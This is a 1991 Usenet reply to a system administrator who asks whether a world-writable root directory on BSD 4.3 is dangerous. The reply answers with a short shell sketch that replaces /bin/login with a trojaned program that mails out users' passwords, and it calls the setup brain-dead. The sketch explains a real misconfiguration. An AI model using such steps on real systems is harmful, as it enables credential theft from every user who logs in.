Path: utzoo!utgpu!news-server.csri.toronto.edu!rpi!usc!elroy.jpl.nasa.gov!decwrl!pa.dec.com!decuac!hussar.dco.dec.com!mjr
From: mjr@hussar.dco.dec.com (Marcus J. Ranum)
Newsgroups: comp.unix.admin
Subject: Re: Possible security problem, need information...
Message-ID: <1991Mar19.151145.11208@decuac.dec.com>
Date: 19 Mar 91 15:11:45 GMT
References: <1991Mar18.200957.166@gacvx2.gac.edu>
Organization: Digital Equipment Corp., Washington Ultrix Resource Center
Lines: 19

In article <1991Mar18.200957.166@gacvx2.gac.edu> dan@gacvx2.gac.edu writes:
>Greetings,
> 
>Is there anything inherently evil giving world write access to the "root" (aka
>"/") directory on a BSD 4.3 UNIX system?  The exact permission with the command
>"ls -ld /" is "drwxrwxrwt".

	mv /bin /...
	mkdir /bin
	ln /.../* /bin
	mv ~/myloginthatmailsmeallloginpasswords /bin/login

	unsubtle, but you get the idea.

	it's not "inherently evil" it's inherently brain-dead.

mjr.
-- 
             The world is just backing store for virtual reality.